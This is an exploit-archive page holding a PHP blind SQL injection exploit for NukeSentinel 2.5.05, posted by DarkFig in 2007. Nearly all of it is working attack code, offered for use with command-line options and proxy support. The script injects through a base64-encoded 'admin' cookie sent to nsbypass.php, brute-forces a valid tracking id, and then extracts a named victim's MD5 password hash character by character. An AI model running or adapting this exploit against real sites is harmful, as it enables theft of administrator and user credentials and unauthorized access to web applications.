what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nukesentinel-sql.txt

nukesentinel-sql.txt
Posted Feb 23, 2007
Authored by DarkFig

NukeSentinel version 2.5.05 blind SQL injection exploit that makes use of nsbypass.php.

tags | exploit, php, sql injection
SHA-256 | b39f4d5f095a03fc0ebd7c32b29313e4d75034acbc441b90128f82e2c9ac5d46

nukesentinel-sql.txt

Change Mirror Download
#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

# (changes.txt)
#
# 2.5.05 CHANGES (2007-01-22):
# + Includes IP2Country 2007-01-19 updated imports.
# - Both data and sql versions. (Not in upgrade package)
# + Moved nsbypass.php into the includes directory (Per User Requests).
#
# Prior versions may also be vulnerable but this exploit will not work
# for these versions (because the file 'nsbypass.php' is not into the
# includes directory).
#

if($argc < 5) {
print("
NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
------------------------------------------------------------------
PHP conditions: none
CMS conditions: disable_switch<=0 (module activated), track_active=1
Credits: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/
Support us: Just click once on our publicity ;)
------------------------------------------------------------------
Usage: $argv[0] -url <url> -victim <username> [Opts]
Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?
-prefix Table prefix (default=nuke)
-tid If you have already used this sploit
-bf You can precise how many hits we can try
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
------------------------------------------------------------------
"); exit(1);
}

$url = getparam('url',1); # http://localhost/php-nuke-7.9/html/
$login = getparam('victim',1); # Default # Victim (root for example)
$admin = (getparam('isadmin')!='') ? getparam('isadmin') : 0;
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'nuke';
$tid = (getparam('tid')!='') ? getparam('tid') : 0;
$nbtst = (getparam('bf')!='') ? getparam('bf') : 10000;
$proxy = getparam('proxy');
$authp = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

# +nukesentinel.php
# 49. if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`,
# `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`,
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
# '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
# '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
# '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
print "\nInserting a row in ${prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP","255.255.255.255");
$xpl->get($url.'index.php');


# Trying to find a valid tid.
# Needed for $tum > 0.
#
print "\nTrying to find a valid tid (max hits=$nbtst)";
$sql = "' OR 1=1#";
$xpl->addcookie("admin",urlencode(base64_encode($sql.':1:')));
for($c=$tid;$c<=$nbtst;$c++)
{
$xpl->get($url."includes/nsbypass.php?tid=$c");
if(!preg_match("#phpnuke.org#",$xpl->getheader()))
{
$tid = $c;
print "\nValid tid found: $tid\nHash: $login -> ";
break;
}
if($c == $nbtst) exit("\n#1 Exploit failed");
}


# MD5 hash length [32]
#
for($a=1;$a<=32;$a++)
{
# MD5 charset [a-f0-9]
#
for($b=48;$b<=71;$b++)
{
# +nsbypass.php
# 24. $num = $db->sql_numrows($db->sql_query("SELECT * FROM ".$prefix."_authors WHERE `aid`='$a_aid' AND `pwd`='$a_pas'"));
# 25. $tum = $db->sql_numrows($db->sql_query("SELECT * FROM ".$prefix."_nsnst_tracked_ips WHERE `tid`='$tid'"));
#
if($admin) $sql = "$login' AND SUBSTR(pwd,$a,1)=CHAR($b)#";
else $sql = "' OR SUBSTR((SELECT user_password FROM ${prfix}_users WHERE username='$login'),$a,1)=CHAR($b)#";

# +nsbypass.php
# 16. $tid = intval($tid);
# 17. if(isset($_COOKIE['admin']) && !empty($_COOKIE['admin'])) {
# 18. $abadmin = base64_decode($_COOKIE['admin']);
# 19. $abadmin = explode(":", $abadmin);
# 20. $a_aid = "$abadmin[0]";
# 21. $a_pas = "$abadmin[1]";
# 22. }
#
$xpl->addcookie("admin",urlencode(base64_encode($sql.':1:')));
$xpl->get($url."includes/nsbypass.php?tid=$tid");

# +nsbypass.php
# 27. if($num > 0 AND $tum > 0) {
# 28. $row = $db->sql_fetchrow($db->sql_query("SELECT * FROM ".$prefix."_nsnst_tracked_ips WHERE `tid`='$tid'"));
# 29. $row['refered_from'] = html_entity_decode($row['refered_from'], ENT_QUOTES);
# 30. header("Location: ".$row['refered_from']);
# 31. } else {
# 32. header("Location: ".$nuke_config['nukeurl']);
# 33. }
#
if(!preg_match("#phpnuke.org#",$xpl->getheader()))
{
print strtolower(chr($b));
break;
}

# MD5 hash do not contains g (char(71)) ... WTF !?
#
if($b == 71) exit("\n#2 Exploit failed");
}
}


# -url "http://www.victim.com/"
# -url http://www.victim.com/
# getparam('url',1)
#
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n#3 -$param parameter required");
else return;
}

?>
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close